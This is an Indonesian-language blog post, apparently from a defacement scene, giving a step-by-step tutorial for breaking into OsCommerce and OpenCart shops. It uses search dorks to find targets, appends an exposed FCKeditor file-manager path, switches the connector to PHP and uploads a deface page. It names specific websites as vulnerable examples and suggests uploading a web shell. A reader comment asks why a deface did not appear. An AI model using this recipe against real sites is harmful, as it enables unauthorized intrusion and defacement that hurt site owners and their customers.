maaf jika beberapa minggu ini saya tidak memposting di blog kesayangan saya ini. dan maaf jika postingan kali ini beberapa teman-teman dan master-master sekalian udah pada tahu :)
cuma ini hanya sekedar share informasi saja :)
TUTORIAL
1. searching target dengan dork "Powered By OsCommerce " atau "Powered By OpenCart" di google, Bing, Atau apa saja
2. tentukan target.
3. Setelah menemukan target tambahkan code Dibawah ini :
"admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html" dibelakang Url/Target (Tanpa tanda kutip)
Exs : http://www.springfieldxd.info/buy/index.php?route=product/product&product_id=57
Jadinya adalah : http://www.springfieldxd.info/buy/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
4. Setelah itu kamu akan menemukan file untuk upload,
5. Untuk Conector, Ganti Asp menjadi PHP file :)
6. Nah sekarang tinggal upload file kalian...!!! Contoh : upload sitelamu.html
Dan hasilnya adalah http://www.target.com/file-kamu.html
Contoh target yang vuln :
http://utahflowers.net/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
dan hasilnya : http://utahflowers.net/r00t.html
Nb : Jika Anda Beruntung, Anda Juga Bisa Melakukan Upload Shell Kedalam Target :)
Untuk Dork, Gunakan Imajinasi kalian dalam memperluar dork tersebut.
Sekian Postingan Saya Kali Ini, Semoga Berguna Bagi Teman-Teman Semua, Amin.
mas mau nanya,waktu saya berhasil upload,kemudian saya buka website itu tapi,websitenya gak ke deface
BalasHapus